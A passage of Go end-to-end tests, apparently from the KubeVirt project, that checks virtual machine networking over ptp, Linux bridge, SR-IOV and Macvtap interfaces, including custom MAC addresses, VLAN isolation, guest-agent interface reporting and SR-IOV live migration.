tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
By("checking virtual machine instance can ping using ptp cni plugin")
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
By("checking virtual machine instance only has one interface")
// lo0, eth0
err = console.SafeExpectBatch(detachedVMI, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: "ip link show | grep -c UP\n"},
&expect.BExp{R: "2"},
}, 15)
Expect(err).ToNot(HaveOccurred())
By("checking pod has only one interface")
// lo0, eth0-nic, k6t-eth0, vnet0
output := tests.RunCommandOnVmiPod(detachedVMI, []string{"/bin/bash", "-c", "/usr/sbin/ip link show|grep -c UP"})
ExpectWithOffset(1, strings.TrimSpace(output)).To(Equal("4"))
})
})
Context("VirtualMachineInstance with cni ptp plugin interface with custom MAC address", func() {
It("[test_id:1705]should configure valid custom MAC address on ptp interface when using tuning plugin", func() {
customMacAddress := "50:00:00:00:90:0d"
ptpInterface := v1.Interface{
Name: "ptp",
InterfaceBindingMethod: v1.InterfaceBindingMethod{
Bridge: &v1.InterfaceBridge{},
},
}
ptpNetwork := v1.Network{
Name: "ptp",
NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{
NetworkName: "ptp-conf-1",
},
},
}
interfaces := []v1.Interface{ptpInterface}
networks := []v1.Network{ptpNetwork}
By("Creating a VM with custom MAC address on its ptp interface.")
interfaces[0].MacAddress = customMacAddress
vmiOne := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
By("Configuring static IP address to ptp interface.")
Expect(configInterface(vmiOne, "eth0", "10.1.1.1/24")).To(Succeed())
By("Verifying the desired custom MAC is the one that was actually configured on the interface.")
ipLinkShow := fmt.Sprintf("ip link show eth0 | grep -i \"%s\" | wc -l\n", customMacAddress)
err = console.SafeExpectBatch(vmiOne, []expect.Batcher{
&expect.BSnd{S: ipLinkShow},
&expect.BExp{R: "1"},
}, 15)
Expect(err).ToNot(HaveOccurred())
By("Verifying the desired custom MAC is not configured inside the pod namespace.")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmiOne, tests.NamespaceTestDefault)
out, err := tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"sh", "-c", "ip a"},
)
Expect(err).ToNot(HaveOccurred())
Expect(strings.Contains(out, customMacAddress)).To(BeFalse())
})
})
Context("VirtualMachineInstance with Linux bridge plugin interface", func() {
It("[test_id:1577]should create two virtual machines with one interface", func() {
By("checking virtual machine instance can ping the secondary virtual machine instance using Linux bridge CNI plugin")
interfaces := []v1.Interface{linuxBridgeInterface}
networks := []v1.Network{linuxBridgeNetwork}
vmiOne := createVMIOnNode(interfaces, networks)
vmiTwo := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
tests.WaitUntilVMIReady(vmiTwo, console.LoginToAlpine)
Expect(configInterface(vmiOne, "eth0", "10.1.1.1/24")).To(Succeed())
By("checking virtual machine interface eth0 state")
Expect(checkInterface(vmiOne, "eth0")).To(Succeed())
Expect(configInterface(vmiTwo, "eth0", "10.1.1.2/24")).To(Succeed())
By("checking virtual machine interface eth0 state")
Expect(checkInterface(vmiTwo, "eth0")).To(Succeed())
By("ping between virtual machines")
Expect(libnet.PingFromVMConsole(vmiOne, "10.1.1.2")).To(Succeed())
})
It("[test_id:1578]should create two virtual machines with two interfaces", func() {
By("checking the first virtual machine instance can ping 10.1.1.2 using Linux bridge CNI plugin")
interfaces := []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
networks := []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
vmiOne := createVMIOnNode(interfaces, networks)
vmiTwo := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
tests.WaitUntilVMIReady(vmiTwo, console.LoginToAlpine)
Expect(configInterface(vmiOne, "eth1", "10.1.1.1/24")).To(Succeed())
By("checking virtual machine interface eth1 state")
Expect(checkInterface(vmiOne, "eth1")).To(Succeed())
Expect(configInterface(vmiTwo, "eth1", "10.1.1.2/24")).To(Succeed())
By("checking virtual machine interface eth1 state")
Expect(checkInterface(vmiTwo, "eth1")).To(Succeed())
By("ping between virtual machines")
Expect(libnet.PingFromVMConsole(vmiOne, "10.1.1.2")).To(Succeed())
})
})
Context("VirtualMachineInstance with Linux bridge CNI plugin interface and custom MAC address.", func() {
customMacAddress := "50:00:00:00:90:0d"
It("[test_id:676]should configure valid custom MAC address on Linux bridge CNI interface.", func() {
By("Creating a VM with Linux bridge CNI network interface and default MAC address.")
vmiTwo := libvmi.NewTestToolingFedora(
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
libvmi.WithInterface(linuxBridgeInterface),
libvmi.WithNetwork(&linuxBridgeNetwork),
libvmi.WithCloudInitNoCloudUserData(tests.GetFedoraToolsGuestAgentUserData(), false),
libvmi.WithCloudInitNoCloudNetworkData(cloudInitNetworkDataWithStaticIPsByDevice("eth1", "10.1.1.2/24"), false))
vmiTwo = tests.StartVmOnNode(vmiTwo, nodes.Items[0].Name)
By("Creating another VM with custom MAC address on its Linux bridge CNI interface.")
linuxBridgeInterfaceWithCustomMac := linuxBridgeInterface
linuxBridgeInterfaceWithCustomMac.MacAddress = customMacAddress
vmiOne := libvmi.NewTestToolingFedora(
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
libvmi.WithInterface(linuxBridgeInterfaceWithCustomMac),
libvmi.WithNetwork(&linuxBridgeNetwork),
libvmi.WithCloudInitNoCloudUserData(tests.GetFedoraToolsGuestAgentUserData(), false),
libvmi.WithCloudInitNoCloudNetworkData(cloudInitNetworkDataWithStaticIPsByMac(linuxBridgeInterfaceWithCustomMac.Name, customMacAddress, "10.1.1.1/24"), false))
vmiOne = tests.StartVmOnNode(vmiOne, nodes.Items[0].Name)
vmiOne = tests.WaitUntilVMIReady(vmiOne, console.LoginToFedora)
tests.WaitAgentConnected(virtClient, vmiOne)
By("Verifying the desired custom MAC is the one that were actually configured on the interface.")
vmiIfaceStatusByName := libvmi.IndexInterfaceStatusByName(vmiOne)
Expect(vmiIfaceStatusByName).To(HaveKey(linuxBridgeInterfaceWithCustomMac.Name), "should set linux bridge interface with the custom MAC address at VMI Status")
Expect(vmiIfaceStatusByName[linuxBridgeInterfaceWithCustomMac.Name].MAC).To(Equal(customMacAddress), "should set linux bridge interface with the custom MAC address at VMI")
By("Verifying the desired custom MAC is not configured inside the pod namespace.")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmiOne, vmiOne.Namespace)
out, err := tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"sh", "-c", "ip a"},
)
Expect(err).ToNot(HaveOccurred())
Expect(strings.Contains(out, customMacAddress)).To(BeFalse())
By("Ping from the VM with the custom MAC to the other VM.")
tests.WaitUntilVMIReady(vmiTwo, console.LoginToFedora)
Expect(libnet.PingFromVMConsole(vmiOne, "10.1.1.2")).To(Succeed())
})
})
Context("Single VirtualMachineInstance with Linux bridge CNI plugin interface", func() {
It("[test_id:1756]should report all interfaces in Status", func() {
interfaces := []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
networks := []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
vmiOne := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
updatedVmi, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Get(vmiOne.Name, &metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(len(updatedVmi.Status.Interfaces)).To(Equal(2))
interfacesByName := make(map[string]v1.VirtualMachineInstanceNetworkInterface)
for _, ifc := range updatedVmi.Status.Interfaces {
interfacesByName[ifc.Name] = ifc
}
for _, network := range networks {
					ifc, isPresent := interfacesByName[network.Name]
					Expect(isPresent).To(BeTrue())
Expect(ifc.MAC).To(Not(BeZero()))
}
Expect(interfacesByName["default"].MAC).To(Not(Equal(interfacesByName["linux-bridge"].MAC)))
Expect(runSafeCommand(vmiOne, fmt.Sprintf("ip addr show eth0 | grep %s\n", interfacesByName["default"].MAC))).To(Succeed())
Expect(runSafeCommand(vmiOne, fmt.Sprintf("ip addr show eth1 | grep %s\n", interfacesByName["linux-bridge"].MAC))).To(Succeed())
})
})
Context("VirtualMachineInstance with invalid MAC address", func() {
It("[test_id:1713]should failed to start with invalid MAC address", func() {
By("Start VMI")
linuxBridgeIfIdx := 1
vmi := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskAlpine), "#!/bin/bash\n")
vmi.Spec.Domain.Devices.Interfaces = []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
vmi.Spec.Domain.Devices.Interfaces[linuxBridgeIfIdx].MacAddress = "de:00c:00c:00:00:de:abc"
vmi.Spec.Networks = []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(vmi)
Expect(err).To(HaveOccurred())
testErr := err.(*errors.StatusError)
Expect(testErr.ErrStatus.Reason).To(BeEquivalentTo("Invalid"))
})
})
})
Describe("[rfe_id:1758][crit:medium][vendor:[email protected]][level:component]VirtualMachineInstance definition", func() {
Context("with qemu guest agent", func() {
It("[test_id:1757] should report guest interfaces in VMI status", func() {
interfaces := []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
networks := []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
v4Mask := "/24"
ep1Ip := "1.0.0.10"
ep2Ip := "1.0.0.11"
ep1Cidr := ep1Ip + v4Mask
ep2Cidr := ep2Ip + v4Mask
v6Mask := "/64"
ep1IpV6 := "fe80::ce3d:82ff:fe52:24c0"
ep2IpV6 := "fe80::ce3d:82ff:fe52:24c1"
ep1CidrV6 := ep1IpV6 + v6Mask
ep2CidrV6 := ep2IpV6 + v6Mask
userdata := fmt.Sprintf(`#!/bin/bash
echo "fedora" |passwd fedora --stdin
setenforce 0
ip link add ep1 type veth peer name ep2
ip addr add %s dev ep1
ip addr add %s dev ep2
ip addr add %s dev ep1
ip addr add %s dev ep2
sudo cp /home/fedora/qemu-guest-agent.service /lib/systemd/system/
sudo systemctl daemon-reload
sudo systemctl start qemu-guest-agent
sudo systemctl enable qemu-guest-agent
`, ep1Cidr, ep2Cidr, ep1CidrV6, ep2CidrV6)
agentVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskFedoraTestTooling), userdata)
agentVMI.Spec.Domain.Devices.Interfaces = interfaces
agentVMI.Spec.Networks = networks
agentVMI.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("1024M")
By("Starting a VirtualMachineInstance")
agentVMI, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(agentVMI)
Expect(err).ToNot(HaveOccurred(), "Should create VMI successfully")
tests.WaitForSuccessfulVMIStart(agentVMI)
// Need to wait for cloud init to finish and start the agent inside the vmi.
tests.WaitAgentConnected(virtClient, agentVMI)
getOptions := &metav1.GetOptions{}
Eventually(func() bool {
updatedVmi, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Get(agentVMI.Name, getOptions)
if err != nil {
return false
}
return len(updatedVmi.Status.Interfaces) == 4
}, 420*time.Second, 4).Should(BeTrue(), "Should have interfaces in vmi status")
updatedVmi, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Get(agentVMI.Name, getOptions)
Expect(err).ToNot(HaveOccurred())
Expect(len(updatedVmi.Status.Interfaces)).To(Equal(4))
interfaceByIfcName := make(map[string]v1.VirtualMachineInstanceNetworkInterface)
for _, ifc := range updatedVmi.Status.Interfaces {
interfaceByIfcName[ifc.InterfaceName] = ifc
}
Expect(interfaceByIfcName["eth0"].Name).To(Equal("default"))
Expect(interfaceByIfcName["eth0"].InterfaceName).To(Equal("eth0"))
Expect(interfaceByIfcName["eth1"].Name).To(Equal("linux-bridge"))
Expect(interfaceByIfcName["eth1"].InterfaceName).To(Equal("eth1"))
Expect(interfaceByIfcName["ep1"].Name).To(Equal(""))
Expect(interfaceByIfcName["ep1"].InterfaceName).To(Equal("ep1"))
Expect(interfaceByIfcName["ep1"].IP).To(Equal(ep1Ip))
Expect(interfaceByIfcName["ep1"].IPs).To(Equal([]string{ep1Ip, ep1IpV6}))
Expect(interfaceByIfcName["ep2"].Name).To(Equal(""))
Expect(interfaceByIfcName["ep2"].InterfaceName).To(Equal("ep2"))
Expect(interfaceByIfcName["ep2"].IP).To(Equal(ep2Ip))
Expect(interfaceByIfcName["ep2"].IPs).To(Equal([]string{ep2Ip, ep2IpV6}))
})
})
})
})
var _ = Describe("[Serial]SRIOV", func() {
var err error
var virtClient kubecli.KubevirtClient
sriovResourceName := os.Getenv("SRIOV_RESOURCE_NAME")
if sriovResourceName == "" {
sriovResourceName = "kubevirt.io/sriov_net"
}
createNetworkAttachementDefinition := func(networkName string, namespace string, networkAttachmentDefinition string) error {
return virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, namespace, networkName)).
Body([]byte(fmt.Sprintf(networkAttachmentDefinition, networkName, namespace, sriovResourceName))).
Do(context.Background()).Error()
}
tests.BeforeAll(func() {
virtClient, err = kubecli.GetKubevirtClient()
tests.PanicOnError(err)
tests.BeforeTestCleanup()
// Check if the hardware supports SRIOV
if err := validateSRIOVSetup(virtClient, sriovResourceName, 1); err != nil {
Skip("Sriov is not enabled in this environment. Skip these tests using - export FUNC_TEST_ARGS='--ginkgo.skip=SRIOV'")
}
		Expect(createNetworkAttachementDefinition(sriovnet1, tests.NamespaceTestDefault, sriovConfCRD)).To(Succeed(), "should successfully create the network")
		Expect(createNetworkAttachementDefinition(sriovnet2, tests.NamespaceTestDefault, sriovConfCRD)).To(Succeed(), "should successfully create the network")
		Expect(createNetworkAttachementDefinition(sriovnet3, tests.NamespaceTestDefault, sriovLinkEnableConfCRD)).To(Succeed(), "should successfully create the network")
})
BeforeEach(func() {
// Multus tests need to ensure that old VMIs are gone
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestDefault).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestAlternative).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Eventually(func() int {
list1, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
list2, err := virtClient.VirtualMachineInstance(tests.NamespaceTestAlternative).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
return len(list1.Items) + len(list2.Items)
}, 6*time.Minute, 1*time.Second).Should(BeZero())
})
Context("VirtualMachineInstance with sriov plugin interface", func() {
getSriovVmi := func(networks []string, cloudInitNetworkData string) *v1.VirtualMachineInstance {
withVmiOptions := []libvmi.Option{
libvmi.WithCloudInitNoCloudNetworkData(cloudInitNetworkData, false),
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
}
// sriov network interfaces
for _, name := range networks {
withVmiOptions = append(withVmiOptions,
libvmi.WithInterface(libvmi.InterfaceDeviceWithSRIOVBinding(name)),
libvmi.WithNetwork(libvmi.MultusNetwork(name)),
)
}
return libvmi.NewSriovFedora(withVmiOptions...)
}
startVmi := func(vmi *v1.VirtualMachineInstance) *v1.VirtualMachineInstance {
vmi, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(vmi)
Expect(err).ToNot(HaveOccurred())
return vmi
}
waitVmi := func(vmi *v1.VirtualMachineInstance) *v1.VirtualMachineInstance {
// Need to wait for cloud init to finish and start the agent inside the vmi.
vmi, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
			// Running multiple SR-IOV jobs with Kind/DinD is resource intensive and can cause transient DeadlineExceeded warnings.
			// KubeVirt re-enqueues the request when this happens, so it is safe to ignore this warning.
// see https://github.com/kubevirt/kubevirt/issues/5027
warningsIgnoreList := []string{"unknown error encountered sending command SyncVMI: rpc error: code = DeadlineExceeded desc = context deadline exceeded"}
tests.WaitUntilVMIReadyIgnoreSelectedWarnings(vmi, console.LoginToFedora, warningsIgnoreList)
tests.WaitAgentConnected(virtClient, vmi)
return vmi
}
checkDefaultInterfaceInPod := func(vmi *v1.VirtualMachineInstance) {
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
By("checking default interface is present")
_, err = tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"ip", "address", "show", "eth0"},
)
Expect(err).ToNot(HaveOccurred())
By("checking default interface is attached to VMI")
_, err = tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"ip", "address", "show", "k6t-eth0"},
)
Expect(err).ToNot(HaveOccurred())
}
checkInterfacesInGuest := func(vmi *v1.VirtualMachineInstance, interfaces []string) {
for _, iface := range interfaces {
Expect(checkInterface(vmi, iface)).To(Succeed())
}
}
It("should create virt-launcher pod with CAP_SYS_RESOURCE capability", func() {
tests.EnableFeatureGate(virtconfig.SRIOVLiveMigrationGate)
defer tests.UpdateKubeVirtConfigValueAndWait(tests.KubeVirtDefaultConfig)
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("Looking up for VMI virt-launcher pod using VMI's label")
virtLauncherPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(virtLauncherPod).ToNot(BeNil(), "should get virt-launcher pod")
computeContainer := tests.GetComputeContainerOfPod(virtLauncherPod)
Expect(computeContainer).ToNot(BeNil(), "should get virt-launcher pod, compute container")
Expect(computeContainer.SecurityContext.Capabilities.Add).
To(ContainElement(k8sv1.Capability(services.CAP_SYS_RESOURCE)))
})
It("should block migration for SR-IOV VMI's when LiveMigration feature-gate is on", func() {
tests.EnableFeatureGate(virtconfig.LiveMigrationGate)
defer tests.UpdateKubeVirtConfigValueAndWait(tests.KubeVirtDefaultConfig)
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
vmim := tests.NewRandomMigration(vmi.Name, vmi.Namespace)
Eventually(func() error {
_, err = virtClient.VirtualMachineInstanceMigration(vmim.Namespace).Create(vmim)
return err
}, 1*time.Minute, 20*time.Second).ShouldNot(Succeed())
})
It("[test_id:1754]should create a virtual machine with sriov interface", func() {
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variable is defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, sriovnet1, sriovResourceName)).To(Succeed())
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has two interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1"})
// there is little we can do beyond just checking two devices are present: PCI slots are different inside
// the guest, and DP doesn't pass information about vendor IDs of allocated devices into the pod, so
// it's hard to match them.
})
It("[test_id:1754]should create a virtual machine with sriov interface with all pci devices on the root bus", func() {
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Annotations = map[string]string{
v1.PlacePCIDevicesOnRootComplex: "true",
}
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variable is defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, sriovnet1, sriovResourceName)).To(Succeed())
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has two interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1"})
domSpec, err := tests.GetRunningVMIDomainSpec(vmi)
Expect(err).ToNot(HaveOccurred())
rootPortController := []api.Controller{}
for _, c := range domSpec.Devices.Controllers {
if c.Model == "pcie-root-port" {
rootPortController = append(rootPortController, c)
}
}
Expect(rootPortController).To(HaveLen(0), "libvirt should not add additional buses to the root one")
})
It("[test_id:3959]should create a virtual machine with sriov interface and dedicatedCPUs", func() {
// In addition to verifying that we can start a VMI with CPU pinning
// this also tests if we've correctly calculated the overhead for VFIO devices.
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Spec.Domain.CPU = &v1.CPU{
Cores: 2,
DedicatedCPUPlacement: true,
}
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variable is defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, sriovnet1, sriovResourceName)).To(Succeed())
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has two interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1"})
})
It("[test_id:3985]should create a virtual machine with sriov interface with custom MAC address", func() {
const mac = "de:ad:00:00:be:ef"
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Spec.Domain.Devices.Interfaces[1].MacAddress = mac
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
var interfaceName string
Eventually(func() error {
var err error
vmi, err = virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
interfaceName, err = getInterfaceNameByMAC(vmi, mac)
return err
}, 140*time.Second, 5*time.Second).Should(Succeed())
By("checking virtual machine instance has an interface with the requested MAC address")
Expect(checkMacAddress(vmi, interfaceName, mac)).To(Succeed())
By("checking virtual machine instance reports the expected network name")
Expect(getInterfaceNetworkNameByMAC(vmi, mac)).To(Equal(sriovnet1))
})
It("[test_id:1755]should create a virtual machine with two sriov interfaces referring the same resource", func() {
sriovNetworks := []string{sriovnet1, sriovnet2}
vmi := getSriovVmi(sriovNetworks, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variables are defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
for _, name := range sriovNetworks {
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, name, sriovResourceName)).To(Succeed())
}
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has three interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1", "eth2"})
// there is little we can do beyond just checking three devices are present: PCI slots are different inside
// the guest, and DP doesn't pass information about vendor IDs of allocated devices into the pod, so
// it's hard to match them.
})
// createSriovVMs instantiates two VMs connected through SR-IOV.
// Note: test case assumes interconnectivity between SR-IOV
// interfaces. It can be achieved either by configuring the external switch
// properly, or via in-PF switching for VFs (works for some NIC models)
createSriovVMs := func(networkNameA, networkNameB, cidrA, cidrB string) (*v1.VirtualMachineInstance, *v1.VirtualMachineInstance) {
// Explicitly choose different random mac addresses instead of relying on kubemacpool to do it:
// 1) we don't at the moment deploy kubemacpool in kind providers
			// 2) even if we did, it's probably a good idea to have the suite not depend on this fact
//
// This step is needed to guarantee that no VFs on the PF carry a duplicate MAC address that may affect
// ability of VMIs to send and receive ICMP packets on their ports.
mac1, err := tests.GenerateRandomMac()
Expect(err).ToNot(HaveOccurred())
mac2, err := tests.GenerateRandomMac()
Expect(err).ToNot(HaveOccurred())
// start peer machines with sriov interfaces from the same resource pool
// manually configure IP/link on sriov interfaces because there is
// no DHCP server to serve the address to the guest
vmi1 := getSriovVmi([]string{networkNameA}, cloudInitNetworkDataWithStaticIPsByMac(networkNameA, mac1.String(), cidrA))
vmi2 := getSriovVmi([]string{networkNameB}, cloudInitNetworkDataWithStaticIPsByMac(networkNameB, mac2.String(), cidrB))
vmi1.Spec.Domain.Devices.Interfaces[1].MacAddress = mac1.String()
vmi2.Spec.Domain.Devices.Interfaces[1].MacAddress = mac2.String()
vmi1 = startVmi(vmi1)
vmi2 = startVmi(vmi2)
vmi1 = waitVmi(vmi1)
vmi2 = waitVmi(vmi2)
vmi1, err = virtClient.VirtualMachineInstance(vmi1.Namespace).Get(vmi1.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
vmi2, err = virtClient.VirtualMachineInstance(vmi2.Namespace).Get(vmi2.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
return vmi1, vmi2
}
It("[test_id:3956]should connect to another machine with sriov interface over IPv4", func() {
cidrA := "192.168.1.1/24"
cidrB := "192.168.1.2/24"
ipA, err := cidrToIP(cidrA)
Expect(err).ToNot(HaveOccurred())
ipB, err := cidrToIP(cidrB)
Expect(err).ToNot(HaveOccurred())
//create two vms on the same sriov network
vmi1, vmi2 := createSriovVMs(sriovnet3, sriovnet3, cidrA, cidrB)
Eventually(func() error {
return libnet.PingFromVMConsole(vmi1, ipB)
}, 15*time.Second, time.Second).Should(Succeed())
Eventually(func() error {
return libnet.PingFromVMConsole(vmi2, ipA)
}, 15*time.Second, time.Second).Should(Succeed())
})
It("[test_id:3957]should connect to another machine with sriov interface over IPv6", func() {
vmi1CIDR := "fc00::1/64"
vmi2CIDR := "fc00::2/64"
vmi1IP, err := cidrToIP(vmi1CIDR)
Expect(err).ToNot(HaveOccurred())
vmi2IP, err := cidrToIP(vmi2CIDR)
Expect(err).ToNot(HaveOccurred())
//create two vms on the same sriov network
vmi1, vmi2 := createSriovVMs(sriovnet3, sriovnet3, vmi1CIDR, vmi2CIDR)
Eventually(func() error {
return libnet.PingFromVMConsole(vmi1, vmi2IP)
}, 15*time.Second, time.Second).Should(Succeed())
Eventually(func() error {
return libnet.PingFromVMConsole(vmi2, vmi1IP)
}, 15*time.Second, time.Second).Should(Succeed())
})
Context("With VLAN", func() {
const (
cidrVlaned1 = "192.168.0.1/24"
sriovVlanNetworkName = "sriov-vlan"
)
var ipVlaned1 string
BeforeEach(func() {
var err error
ipVlaned1, err = cidrToIP(cidrVlaned1)
Expect(err).ToNot(HaveOccurred())
				Expect(createNetworkAttachementDefinition(sriovVlanNetworkName, tests.NamespaceTestDefault, sriovConfVlanCRD)).To(Succeed(), "should successfully create the vlaned network")
})
It("should be able to ping between two VMIs with the same VLAN over SRIOV network", func() {
_, vlanedVMI2 := createSriovVMs(sriovVlanNetworkName, sriovVlanNetworkName, cidrVlaned1, "192.168.0.2/24")
By("pinging from vlanedVMI2 and the anonymous vmi over vlan")
Eventually(func() error {
return libnet.PingFromVMConsole(vlanedVMI2, ipVlaned1)
}, 15*time.Second, time.Second).ShouldNot(HaveOccurred())
})
It("should NOT be able to ping between Vlaned VMI and a non Vlaned VMI", func() {
_, nonVlanedVMI := createSriovVMs(sriovVlanNetworkName, sriovnet3, cidrVlaned1, "192.168.0.3/24")
By("pinging between nonVlanedVMIand the anonymous vmi")
Eventually(func() error {
return libnet.PingFromVMConsole(nonVlanedVMI, ipVlaned1)
}, 15*time.Second, time.Second).Should(HaveOccurred())
})
})
Context("migration", func() {
BeforeEach(func() {
if err := validateSRIOVSetup(virtClient, sriovResourceName, 2); err != nil {
Skip("Migration tests require at least 2 nodes: " + err.Error())
}
})
BeforeEach(func() {
tests.EnableFeatureGate(virtconfig.SRIOVLiveMigrationGate)
})
AfterEach(func() {
tests.DisableFeatureGate(virtconfig.SRIOVLiveMigrationGate)
})
var vmi *v1.VirtualMachineInstance
var interfaceName string
const mac = "de:ad:00:00:be:ef"
BeforeEach(func() {
// The SR-IOV VF MAC should be preserved on migration, therefore explicitly specify it.
vmi = getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Spec.Domain.Devices.Interfaces[1].MacAddress = mac
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
// It may take some time for the VMI interface status to be updated with the information reported by
// the guest-agent.
Eventually(func() error {
var err error
vmi, err = virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
interfaceName, err = getInterfaceNameByMAC(vmi, mac)
return err
}, 30*time.Second, 5*time.Second).Should(Succeed())
Expect(checkMacAddress(vmi, interfaceName, mac)).To(Succeed(), "SR-IOV VF is expected to exist in the guest")
})
It("should be successful with a running VMI on the target", func() {
By("starting the migration")
migration := tests.NewRandomMigration(vmi.Name, vmi.Namespace)
migrationUID := tests.RunMigrationAndExpectCompletion(virtClient, migration, tests.MigrationWaitTime)
tests.ConfirmVMIPostMigration(virtClient, vmi, migrationUID)
Expect(checkMacAddress(vmi, interfaceName, mac)).To(Succeed(),
"SR-IOV VF is expected to exist in the guest after migration")
})
})
})
})
var _ = SIGDescribe("[Serial]Macvtap", func() {
var err error
var virtClient kubecli.KubevirtClient
var macvtapLowerDevice string
var macvtapNetworkName string
BeforeEach(func() {
virtClient, err = kubecli.GetKubevirtClient()
tests.PanicOnError(err)
macvtapLowerDevice = "eth0"
macvtapNetworkName = "net1"
// cleanup the environment
tests.BeforeTestCleanup()
})
BeforeEach(func() {
tests.EnableFeatureGate(virtconfig.MacvtapGate)
})
BeforeEach(func() {
result := virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestDefault, macvtapNetworkName)).
